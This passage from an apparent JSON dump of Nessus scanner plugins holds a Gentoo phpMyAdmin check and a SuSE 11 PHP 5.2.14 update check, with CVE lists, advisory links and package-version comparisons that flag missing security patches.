CVE-2010-2100, CVE-2010-2101,\n CVE-2010-2190, 
value:\"https://www.phpmyadmin.net/security/PMASA-2011-11/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-12/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-17/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-18/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-9/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201201-01\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2010-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 3.4.9\"), vulnerable:make_list(\"lt 3.4.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:42", "description": "PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "nessus", "title": "SuSE 11 / 11.1 Security Update : Apache 2 (SAT Patch Numbers 2880 / 2881)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", 
"CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:11:php5", "p-cpe:/a:novell:suse_linux:11:php5-bcmath", "p-cpe:/a:novell:suse_linux:11:php5-bz2", "p-cpe:/a:novell:suse_linux:11:php5-calendar", "p-cpe:/a:novell:suse_linux:11:php5-ldap", "p-cpe:/a:novell:suse_linux:11:php5-ctype", "p-cpe:/a:novell:suse_linux:11:php5-mbstring", "p-cpe:/a:novell:suse_linux:11:php5-curl", "p-cpe:/a:novell:suse_linux:11:php5-mcrypt", "p-cpe:/a:novell:suse_linux:11:php5-mysql", "p-cpe:/a:novell:suse_linux:11:php5-dba", "p-cpe:/a:novell:suse_linux:11:php5-odbc", "p-cpe:/a:novell:suse_linux:11:php5-openssl", "p-cpe:/a:novell:suse_linux:11:php5-pcntl", "p-cpe:/a:novell:suse_linux:11:php5-pdo", "p-cpe:/a:novell:suse_linux:11:php5-pear", "p-cpe:/a:novell:suse_linux:11:php5-dbase", "p-cpe:/a:novell:suse_linux:11:php5-pgsql", "p-cpe:/a:novell:suse_linux:11:php5-pspell", "p-cpe:/a:novell:suse_linux:11:php5-shmop", "p-cpe:/a:novell:suse_linux:11:php5-snmp", "p-cpe:/a:novell:suse_linux:11:php5-soap", "p-cpe:/a:novell:suse_linux:11:php5-suhosin", "p-cpe:/a:novell:suse_linux:11:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php5-sysvsem", "p-cpe:/a:novell:suse_linux:11:php5-sysvshm", "p-cpe:/a:novell:suse_linux:11:php5-tokenizer", "p-cpe:/a:novell:suse_linux:11:php5-wddx", "p-cpe:/a:novell:suse_linux:11:php5-xmlreader", "p-cpe:/a:novell:suse_linux:11:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php5-xsl", "p-cpe:/a:novell:suse_linux:11:php5-zip", "p-cpe:/a:novell:suse_linux:11:php5-zlib", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php5-dom", 
"p-cpe:/a:novell:suse_linux:11:php5-exif", "p-cpe:/a:novell:suse_linux:11:php5-fastcgi", "p-cpe:/a:novell:suse_linux:11:php5-ftp", "p-cpe:/a:novell:suse_linux:11:php5-gd", "p-cpe:/a:novell:suse_linux:11:php5-gettext", "p-cpe:/a:novell:suse_linux:11:php5-gmp", "p-cpe:/a:novell:suse_linux:11:php5-hash", "p-cpe:/a:novell:suse_linux:11:php5-iconv", "p-cpe:/a:novell:suse_linux:11:php5-json"], "id": "SUSE_11_APACHE2-MOD_PHP5-100805.NASL", "href": "https://www.tenable.com/plugins/nessus/50890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50890);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Apache 2 (SAT Patch Numbers 2880 / 2881)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - 
CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=588975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0397.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1860.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1862.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1864.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1866.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1914.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1915.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1917.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2093.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2094.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2097.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2100.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2010-2101.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2190.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2191.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2225.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2484.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2531.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3065.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2880 / 2881 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/05\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"apache2-mod_php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bcmath-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bz2-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-calendar-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ctype-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-curl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dba-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dbase-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dom-5.2.14-0.1.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:0, reference:\"php5-exif-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-fastcgi-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ftp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gd-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gettext-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-hash-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-iconv-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-json-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ldap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mbstring-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mcrypt-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mysql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-odbc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-openssl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pcntl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pdo-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pear-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pgsql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pspell-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-shmop-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-snmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, 
reference:\"php5-soap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-suhosin-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvmsg-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvsem-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvshm-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-tokenizer-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-wddx-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlreader-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlrpc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlwriter-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xsl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zip-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zlib-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-mod_php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bcmath-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bz2-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-calendar-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ctype-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-curl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dba-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dbase-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, 
reference:\"php5-dom-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-exif-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-fastcgi-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ftp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gd-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gettext-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-hash-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-iconv-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-json-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ldap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mbstring-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mcrypt-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mysql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-odbc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-openssl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pcntl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pdo-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pear-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pgsql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pspell-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-shmop-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-snmp-5.2.14-0.1.1\")) 
